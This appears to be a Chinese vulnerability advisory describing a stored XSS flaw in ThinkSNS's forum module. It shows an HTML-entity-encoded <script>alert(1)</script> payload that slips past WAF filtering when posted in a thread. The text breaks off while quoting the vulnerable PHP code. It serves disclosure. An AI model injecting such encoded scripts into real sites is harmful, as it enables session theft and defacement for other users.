ThinkSNS微吧储存型XSS(无视WAF,无过滤插入任意代码)

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ThinkSNS微吧储存型XSS(无视WAF,无任何过滤,可插入任意代码) 官网demo测试。 ### 详细说明: 进入http://demo.thinksns.com/t3/weiba 发布新贴, 在正文里面输入HTML转码后的脚本,例如: ``` <script>alert(1);</script> ``` HTML编码后为: ``` &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62; ``` 即为我们要加到正文的内容。 [<img src="https://images.seebug.org/upload/201411/13104446b78c569b7b6ee2c35d0d02b18ca5e0fe.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/13104446b78c569b7b6ee2c35d0d02b18ca5e0fe.png) 确定之后即可看到脚本被执行了。 [<img src="https://images.seebug.org/upload/201411/1310472359b57d59cc30f2d5f24179674af4c16c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/1310472359b57d59cc30f2d5f24179674af4c16c.png) 看看代码: apps/weiba/Lib/Action/IndexAction.class.php ``` 413 public function postDetail(){ 414 $post_id = intval($_GET['post_id']); 415 $post_detail =...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息